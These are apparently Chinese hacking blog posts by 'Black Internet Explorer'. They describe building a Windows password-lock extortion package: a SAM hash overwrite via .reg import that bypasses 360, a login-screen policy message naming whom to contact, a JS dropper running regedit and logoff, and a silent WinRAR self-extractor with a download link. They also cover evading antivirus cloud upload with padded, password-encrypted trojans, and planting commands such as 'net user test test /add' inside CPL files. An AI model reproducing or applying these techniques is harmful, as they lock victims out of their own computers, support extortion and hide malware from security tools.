奇怪的过程调用【二】配合高强策略写过主防的敲竹杠 上一期说道，那些东西在系统战场是没法活用的，这次正好研究出来了某些玩意就顺便写出来玩玩一 完美配合 - 伟大的WinRAR自解压来看看某人的神比喻：我们可以清楚的知道，WinRAR是有后台，各大杀软也打不开的铁裤衩想要打开，那么必须得大伤元气（时间）。所以这正和我意但是，如果内部文件都不报毒，但是却不是可执行文件，且还带三个附带插件才能正确使用的文件来说，用WinRaR来当外壳是最不错的自己写的壳也行，但是你这个无名小卒的行为谁知道哪天会被卡擦了，当然还是要绿标的WINRAR最好了二 深度解析，蛋疼思考策略和小小的蛋疼行为绕过杀软主防因为改密码已经可以成功了。原理是，360对Sam项的写入监控的很严密，但是如果原本就有项值，通过reg add或者regedit /s 写入是不会拦截的微软用户的格式如下：每个用户对应一个值。administrator对应的必然是1F4，这是每个系统都一样的。我也不知道为啥，反正就是这样、F = 权限   V = 加密的hash值以上就不用多说了吧，自己配置个V，导出成reg即可。能保证导入到1F4的V就行。接下来就是我想了半天的，添加用户由于我那个VBS脚本被杀了，so。。。。用尽了各种方法，依旧没想到不过反应过来，添加用户的初衷是让用户知晓自己电脑被锁，且知道需要联系谁。so。我想到了个更好的东西策略组是能和rootkit级别抗衡的存在，它是最强大的，只要设置的好，它将使你电脑百毒不侵。每个策略组都对应一个注册表键值通过以上，你们明白了吧。在登录界面弹出对话框可比添加用户的方式好多了。地址我已经蛋疼的找到了，配置好导出下，就成这样了a=new   ActiveXObject("wscript.shell"); a.run("cmd /c start"+" "+"d:\\a.mp3");三 正确的配置，完美的绕过好吧，上一章的蛋疼貌似是我瞎编的，反正我想那个方法确实很蛋疼。QAQ，真的。还有我是个标题党，别喷我好。我们继续配置。按照上次的配置，cpl文件配置好好，我们配置我们的jsjs很简单，就几行代码：{card-describe title="保存为123.JS"}a=new   ActiveXObject("wscript.shell"); a.run("regedit /s V.reg"); a.run("regedit /s Meaasgbox.reg"); a.run("shutdown -l");//可以建议换跳命令，杀软貌似会对这查杀。{/card-describe}好。我们把那些文件使用winrar自解压配置做成静默安装包，怎么做我就不说了。自己百度去。提醒下，解压路径一定要和cpl文件吻合。你改的js文件在哪里，路径也要在哪里大功告成好吧，我承认我多次一举，其实自解压写成执行js就行了，没必要配置cpl，反正已经写完了，我也懒得改了。就这样了后记-各种查杀结果{cloud title="下载地址" type="default" url="http://pan.baidu.com/s/1dDF13od" password=""/}世界查毒网地址;  http://r.virscan.org/report/182ee20ef680d97e14afe98822400978貌似是因为我的那条shutdown被查出了一个QAQ。作者的一些话：很多人都说我这些垃圾，太简单。我想问问，一定要强大的汇编？或者冗杂的代码？还是需要一大堆你看不懂的代码才叫高级？我的作用只有目的，达到目的可以不择手段。既然有简单达到目的的方法，何尝不用？Black Internet Explorer 参上

永久过云上传且不改体积 如今免杀已经成为一个重要的话题，现在。免杀简单，云上报非常讨厌（主动防御和启发技术不算）。鉴于此，我想到了个很简单的免杀技术，理论可以过所有杀软的上传。技术运用的依旧是那个扩大文件体积，然而扩大了却没办法缩小。传播很困难，但是，Winrar给我们了个好处。增大文件体积就是在尾部添加垃圾资源，达到扩大体积的效果，而Winrar刚好可以压缩这些资源。比如你把3kb的文件尾部添加垃圾资源到3MB，但是经过压缩依旧是3kb。但是这样子还是会被上传，依旧过不了云，所以我们就需要Winrar的加密算法。就算是大牛，想要破解Winrar也不是那么简单的，更何况区区一个杀软的引擎引擎无法解密带密码的winRAR压缩包，即缩小了体积杀软上传了又没法得到里面免杀木马的资源，更无法去入库或者查杀。但是winrar不是可执行文件，且需要密码，user一般不怎么会打开，所以我们需要写一个文件头这个文件头功能很简单，所以可以保证理论就算是被上传了也不会被杀，入库的话我们也没有病毒代码也不会去入库。功能就是用命令行winrar.exe文件写出资源内的winRAR带增大免杀木马的压缩包用命令行参数进行解压到制定文件夹随着解压压缩包内的文件也随之增大，恢复扩大的大小，出来时就几百MB，压缩包内几十kb，就这样经过自己测试可以躲过360等。也就是说其实外面的exe是个壳，负责解密工作，里面是加密的数据（增大后又带密码压缩的马子）杀软引擎应该没有那么高级去识别程序内部命令行参数是否为压缩包密码吧，当然如果人工的话就绝对会被发现咯Black Internet Explorer 参上

在系统内部中的cpl文件插马【一】 cpl文件是什么，相信很多玩了很久的电脑的人都不知道列举一个，控制面板中的用户帐户就是cpl文件。今天就来讲讲如何在cpl文件中插入我们想要的代码1.了解cpl文件什么是cpl文件，先来看看百度的定义上面提到了以.CPL扩展名结尾文件”，既然又与控制面板有关，哪我就来分析一下CPL文件到底是什么吧，随便找一些CPL文件，如：main.cpl,access.cpl等，我用Dumpbin测试结果如下：C:/WINDOWS/system32>dumpbin main.cpl Microsoft (R) COFF Binary File Dumper Version 6.00.8168 Copyright (C) Microsoft Corp 1992-1998. All rights reserved. Dump of file main.cpl File Type: DLL（由DLL可以知道它是一个DLL文件） C:/WINDOWS/system32>dumpbin /exports appwiz .cpl Microsoft (R) COFF Binary File Dumper Version 6.00.8168 Copyright (C) Microsoft Corp 1992-1998. All rights reserved. Dump of file appwiz.cpl File Type: DLL Section contains the following exports for appwiz.dll ordinal hint RVA name 1 0 00017926 CPlApplet 2 1 00017F05 ConfigStartMenu ．．．．．． C:/WINDOWS/system32>dumpbin /exports access.cpl Microsoft (R) COFF Binary File Dumper Version 6.00.8168 Copyright (C) Microsoft Corp 1992-1998. All rights reserved. Dump of file access.cpl File Type: DLL Section contains the following exports for Access.dll ordinal hint RVA name 1 0 00004B41 CPlApplet 2 1 00004B33 DebugMain 3 2 00004B30 DllRegisterServer 3 3 00004A27 DllUnregisterServer从上面的测试结果你看到了什么，我认为至少有两点：1、 CPL文件就是一个DLL文件2、 CPL文件都导出了一个CPLApplet函数这两点揭开了控制面板程序的神秘面纱，你不会再对控制面板程序是什么感到疑惑了，其实，控制面板程序就是一个须导出CPLApplet函数的DLL文件，只是挂上了CPL的后缀名而已。既然都要导出CPLApplet函数，可以想象CPLApplet这个函数的重要性,其实，不光是控制面板，只要是想加载CPL文件的其他所有应用程序都必须取得CPLApplet函数的地址然后通过调用该函数来完成相应得功能的，以下是我从MSDN得来的关于它的声明，详细信息请参考MSDN.既然上面说了，cpl其实就是一个变体DLL,那么我们来分析下CPL的功能到底是怎么实现的这。。怎么看都像是html作用的，接下来我们拉出我们的神器 : RestoratorRestorator:这是一款很强大的资源树分析软件,完全比得上Reshacker我们拉进来分析，果不其然，有个html。接下来我们就来分析了2.开始插马我们来看看里面到底是什么可以很清晰的看到，由htm和js构成、发现了一段代码：可以很明确的断定，cpl文件是由Html构成界面，js实现操作的文件好，接下来我们就来修改发现htm都定义好了，我们就来找找主页面半天的查找结果，找到了这个就是主页的按钮。一打开会自动执行这玩意。好，现在我们先随便配置个脚本WshShell = WScript.CreateObject("WScript.Shell"); WshShell.Run("net user test test /add");好，以上是简单的添加帐户的代码，之后修改js以上随便找个修改好，保存，打开双击试试查看效果帐户成功添加。、3.最后总结（最后的话）这次是教如何插马，但是在严酷的系统战场上是无法满足需求的地址只能固定却不能修改，这显然是无法达到我们的要求尽情期待下一期，奇怪的过程调用第二期By:Black Internet Explorer